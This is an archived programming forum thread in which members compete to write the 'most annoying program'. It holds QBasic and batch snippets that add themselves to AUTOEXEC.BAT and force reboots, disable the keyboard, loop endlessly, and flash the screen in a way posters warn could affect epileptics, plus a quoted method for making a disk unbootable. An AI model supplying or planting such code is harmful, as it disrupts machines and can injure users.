I've gotta say, this is the most annoying program ever! I mean, colours and sounds and not being able to exit easily are annoying, but fucking with your IE ports is worse!

How about a different approach:

Code:

x

Thats annoying because it wont compile and cannot be run in the interpretter without error. Its even more annoying, because you cant debug or fix it, because you dont know what I had in mind, it could have been a really great game or awesome screensaver but now you will never know. ;-)

BTW, Rel that /is/ annoying, I dont even want to run it, but its annoying to know that you think like that. j/k ;-)

If I could be bother digging out the info on that Intel video card that had a hardware bug that allowed programmers to feed instructions to the card that would cause its cpu to overheat and blowup, that would certainly be annoying, then again I doubt anyone has one of those cards any more.

Title: New challenge - most annoying program
Post by: Neo on June 03, 2003, 07:51:05 AM
How about this one:

Code:
OPEN "C:\AUTOEXEC.BAT" FOR APPEND AS #1
   PRINT #1, "THISPROGRAM.EXE"
CLOSE #1

DEF SEG = &HFFFF
CALL Absolute(0)

Do not use F8 or advanced starting up options. Works under Win98. (not under later).

Title: New challenge - most annoying program
Post by: Phydaux on June 04, 2003, 11:27:17 AM
I suppose you could always add this to your autoexec.bat file
Code:
:loop
autoexec.bat
goto loop

Title: New challenge - most annoying program
Post by: seph on June 04, 2003, 02:48:42 PM
Does that just keep opening up the autoexec.bat file until all your memory runs out, and your sys crashes?

Title: New challenge - most annoying program
Post by: Phydaux on June 04, 2003, 11:59:03 PM
Not just that, each file you open continues to open more files, kinda like bacteria multiplying. :) I'm sure Windows Safe Mode would stop it tho.

Title: New challenge - most annoying program
Post by: Neo on June 05, 2003, 04:05:59 AM
Try to put this in autoexec.bat:

Code:
:loop
md a
cd a
goto loop

Title: New challenge - most annoying program
Post by: oracle on June 05, 2003, 07:31:00 PM
Code:
OPEN "C:\AUTOEXEC.BAT" FOR APPEND AS #1
PRINT #1, "THISPROG.EXE"
CLOSE

DEF SEG = 0
POKE &H473, &H12
POKE &H472, &H34
DEF SEG = &HFFFF
CALL Absolute(0)

Well... he's right about that the program is annoying. But it is very insulting too.

I think Seph should at least say sorry to wildcard, because wildcard was the one who made this forum and qbn existing. HE IS THE MAN!

Yes there is:

Code:
SUB KT.KB.KeyboardOff
        OUT &H60, &HF5
END SUB

SUB KT.KB.KeyboardOn
OUT &H60, &HF4
END SUB

These are the functions for activating or deactivating the keyboard. It's tested and works.

Title: New challenge - most annoying program
Post by: barok on June 18, 2003, 11:21:45 PM
ooh!  let me try!
Code:

kt.kb.keyboardoff
randomize timer
screen 13
do
line (0,0)-(320, 200), rnd * 256, bf
sound rnd * 1000 + 2000, .5
loop

SUB KT.KB.KeyboardOff    'thanks neo!
        OUT &H60, &HF5
END SUB

thanks neo for the keyboard disabling code!  goes through a loop that flashes the screen different colors, and making beeping sounds.  the only way you can get out of this is to turn off the comp.

geez that's annoying. can't top it but here's mine:
Code:

SCREEN 11
DO: RESTORE QUOTES: A = INT(RND * 6) + 1: FOR B = 1 TO A: READ QUOTE$: NEXT B
PRINT "RANDOM AOL USER> "; QUOTE$
FOR C = 1 TO 32767: NEXT C: FOR C = 1 TO 32767: NEXT C
LOOP
QUOTES:
DATA "LOL", "OMG", "LIEK YAH!", "WTF!!!111ONEONEONE", "hI tHeRe!!!", "R U N AOL USER? OIC"

I kinda cheated too.  :king:

Title: New challenge - most annoying program
Post by: barok on June 19, 2003, 09:31:50 PM
mine?  i tested it in this order:

-first added the bf after the line
-tested the sound frequency to find the most annoying sounds.
-tested the keyboard turner-offer (it works!  :bounce: )

maybe if it's a pure sound it'll sound even more annoying... gotta test it when my parents aren't here.  even more annoying: convert it to a screensaver and make the computer use it!  :D )

I know I'm reviving this topic from the dead, but I just wanted to post.... SEIZURE..z0rz!!

Code:
OUT &H60, &HF5
SCREEN 13
DO
   PAINT (159, 99), 15, 15
     CLS
   PAINT (159, 99), 0, 0
     CLS
LOOP

I ran that for about a minute on my 1ghz PIII and I think I've lost many braincells because of it.

If you have epilepsy I suggest you NOT run this program.

this is kinda just thrown out there, but, make it so your disk drive continually opens.  have the screen say something like, "disk drive will open 40 times", but actually have it open 400 times!!!

i'd say mine is good.  mine is similiar to ninkazu's, but mine also has sound!   :bounce:

mine is us there somewhere if you want to test it.

what i really hate though, is when the computer is reading from the disk drive.  the sounds it makes drives me nuts!   i especially hate it when the folder i'm accessing the disk drive with freezes...

You might borrow a floopy drive from someone. Or, if you don't use your DOS machine anymore, you could take the hard drive and put it into your new machine as an alternate drive.

You might borrow a floopy drive from someone. Or, if you don't use your DOS machine anymore, you could take the hard drive and put it into your new machine as an alternate drive.

or you can give it to me

PRINT "Press any key when done..."
SLEEP (0)
DO
PRINT "WHAT!?!? I SAID THROW YOUR *(^(*& COMP OUT OF YOUR ^&$%& WINDOW, *#$%$%&*&^!!!!!"

I suppose adding
Code:
echo ^L > LPT1
to a batch file could add to the annoyance :) (sometimes PRN is better than LPT1/2)

With quotes, of course ;)

That reminds me of my brother's Mambo t-shirt. On the front there's only the mambo logo, and on the back there's a smiley doing a *huge* cheesy smile, and the text around him says "SMILE if you're a wanker" :rotfl:

I can't quite remember why. I found it a while ago on the discovery channel mythbusters forums....
Oh wait, I screwed up...

Quote from: metealmasher
By writing two zero bytes to a specific location of the boot sector on the hard drive the computer can be made so it will not boot, even from a floppy. This can be done from the keyboard using debug. By calling BIOS INT 13h twice and placing 00 at an offset of 510 in the boot sector the machine will be disabled.

The only way to recover the hard drive is to place it in another machine as a slave and zero fill it.

so what is the asm code to that and can you fix that with asm on a disk

Title: New challenge - most annoying program
Post by: KiZ on December 01, 2005, 11:34:42 PM
from the same forum...

Quote
Recent ones don't even look at the hard drive until they've looked at the floppy and CD-ROM (depending on the boot order selection, of course) and found no bootable media in either.

Quote
The BIOS always starts before the boot sector is even read. If you write those pesky two zero-bytes, all you have to do is to go into the BIOS setup screen on boot up and tell the computer to read the floppy drive before it tries the hard drive.

oh and everett, what is this all about? Its kind of amusing actually..

Lunix usually refers to any UNIX-derived or based OS.  Since some hardcore nerds get offended when you categorise FreeBSD, OpenBSD, etc. as flavours of Linux, so it's usually safer to refer to them as something else... personally I use the term "nix" or "*nix".

Also, the two bytes that that person cunningly decides to overwrite is easily fixable.  It's the same two magic bytes for every boot sector recognised on the x86, so you can fix it by writing those bytes back.  Nothing to cry about.  : )

                next

not sure but that should hit just about every comp that your comp can reach and slow them to. but thats if they allow it.
